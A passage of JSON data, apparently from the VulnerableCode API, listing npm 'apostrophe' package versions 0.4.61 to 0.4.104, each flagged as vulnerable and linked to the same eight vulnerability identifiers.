rability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.61"},{"url":"http://public2.vulnerablecode.io/api/packages/267916?format=json","purl":"pkg:npm/apostrophe@0.4.62","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.62"},{"url":"http://public2.vulnerablecode.io/api/packages/267917?format=json","purl":"pkg:npm/apostrophe@0.4.63","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.63"},{"url":"http://public2.vulnerablecode.io/api/packages/267918?format=json","purl":"pkg:npm/apostrophe@0.4.64","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.64"},{"url":"http://public2.vulnerablecode.io/api/packages/267919?format=json","purl":"pkg:npm/apostrophe@0.4.65","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.65"},{"url":"http://public2.vulnerablecode.io/api/packages/267920?format=json","purl":"pkg:npm/apostrophe@0.4.66","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.66"},{"url":"http://public2.vulnerablecode.io/api/packages/267921?format=json","purl":"pkg:npm/apostrophe@0.4.67","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.67"},{"url":"http://public2.vulnerablecode.io/api/packages/267922?format=json","purl":"pkg:npm/apostrophe@0.4.68","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.68"},{"url":"http://public2.vulnerablecode.io/api/packages/267923?format=json","purl":"pkg:npm/apostrophe@0.4.69","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.69"},{"url":"http://public2.vulnerablecode.io/api/packages/267924?format=json","purl":"pkg:npm/apostrophe@0.4.70","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.70"},{"url":"http://public2.vulnerablecode.io/api/packages/267925?format=json","purl":"pkg:npm/apostrophe@0.4.71","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.71"},{"url":"http://public2.vulnerablecode.io/api/packages/267926?format=json","purl":"pkg:npm/apostrophe@0.4.72","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.72"},{"url":"http://public2.vulnerablecode.io/api/packages/267927?format=json","purl":"pkg:npm/apostrophe@0.4.73","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.73"},{"url":"http://public2.vulnerablecode.io/api/packages/267928?format=json","purl":"pkg:npm/apostrophe@0.4.74","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.74"},{"url":"http://public2.vulnerablecode.io/api/packages/267929?format=json","purl":"pkg:npm/apostrophe@0.4.75","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.75"},{"url":"http://public2.vulnerablecode.io/api/packages/267930?format=json","purl":"pkg:npm/apostrophe@0.4.76","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.76"},{"url":"http://public2.vulnerablecode.io/api/packages/267931?format=json","purl":"pkg:npm/apostrophe@0.4.77","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.77"},{"url":"http://public2.vulnerablecode.io/api/packages/267932?format=json","purl":"pkg:npm/apostrophe@0.4.78","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.78"},{"url":"http://public2.vulnerablecode.io/api/packages/267933?format=json","purl":"pkg:npm/apostrophe@0.4.79","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.79"},{"url":"http://public2.vulnerablecode.io/api/packages/267934?format=json","purl":"pkg:npm/apostrophe@0.4.80","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.80"},{"url":"http://public2.vulnerablecode.io/api/packages/267935?format=json","purl":"pkg:npm/apostrophe@0.4.81","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.81"},{"url":"http://public2.vulnerablecode.io/api/packages/267936?format=json","purl":"pkg:npm/apostrophe@0.4.82","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.82"},{"url":"http://public2.vulnerablecode.io/api/packages/267937?format=json","purl":"pkg:npm/apostrophe@0.4.83","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.83"},{"url":"http://public2.vulnerablecode.io/api/packages/267938?format=json","purl":"pkg:npm/apostrophe@0.4.84","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.84"},{"url":"http://public2.vulnerablecode.io/api/packages/267939?format=json","purl":"pkg:npm/apostrophe@0.4.85","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.85"},{"url":"http://public2.vulnerablecode.io/api/packages/267940?format=json","purl":"pkg:npm/apostrophe@0.4.86","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.86"},{"url":"http://public2.vulnerablecode.io/api/packages/267941?format=json","purl":"pkg:npm/apostrophe@0.4.87","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.87"},{"url":"http://public2.vulnerablecode.io/api/packages/267942?format=json","purl":"pkg:npm/apostrophe@0.4.88","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.88"},{"url":"http://public2.vulnerablecode.io/api/packages/267943?format=json","purl":"pkg:npm/apostrophe@0.4.89","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.89"},{"url":"http://public2.vulnerablecode.io/api/packages/267944?format=json","purl":"pkg:npm/apostrophe@0.4.90","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.90"},{"url":"http://public2.vulnerablecode.io/api/packages/267945?format=json","purl":"pkg:npm/apostrophe@0.4.91","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.91"},{"url":"http://public2.vulnerablecode.io/api/packages/267946?format=json","purl":"pkg:npm/apostrophe@0.4.92","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.92"},{"url":"http://public2.vulnerablecode.io/api/packages/267947?format=json","purl":"pkg:npm/apostrophe@0.4.93","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.93"},{"url":"http://public2.vulnerablecode.io/api/packages/267948?format=json","purl":"pkg:npm/apostrophe@0.4.94","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.94"},{"url":"http://public2.vulnerablecode.io/api/packages/267949?format=json","purl":"pkg:npm/apostrophe@0.4.95","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.95"},{"url":"http://public2.vulnerablecode.io/api/packages/267950?format=json","purl":"pkg:npm/apostrophe@0.4.96","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.96"},{"url":"http://public2.vulnerablecode.io/api/packages/267951?format=json","purl":"pkg:npm/apostrophe@0.4.97","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.97"},{"url":"http://public2.vulnerablecode.io/api/packages/267952?format=json","purl":"pkg:npm/apostrophe@0.4.98","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.98"},{"url":"http://public2.vulnerablecode.io/api/packages/267953?format=json","purl":"pkg:npm/apostrophe@0.4.99","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.99"},{"url":"http://public2.vulnerablecode.io/api/packages/267954?format=json","purl":"pkg:npm/apostrophe@0.4.100","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.100"},{"url":"http://public2.vulnerablecode.io/api/packages/267955?format=json","purl":"pkg:npm/apostrophe@0.4.101","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.101"},{"url":"http://public2.vulnerablecode.io/api/packages/267956?format=json","purl":"pkg:npm/apostrophe@0.4.102","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.102"},{"url":"http://public2.vulnerablecode.io/api/packages/267957?format=json","purl":"pkg:npm/apostrophe@0.4.103","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.103"},{"url":"http://public2.vulnerablecode.io/api/packages/267958?format=json","purl":"pkg:npm/apostrophe@0.4.104","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.104"},{"url":"http://public2.vulnerablecode.io/api/packages/2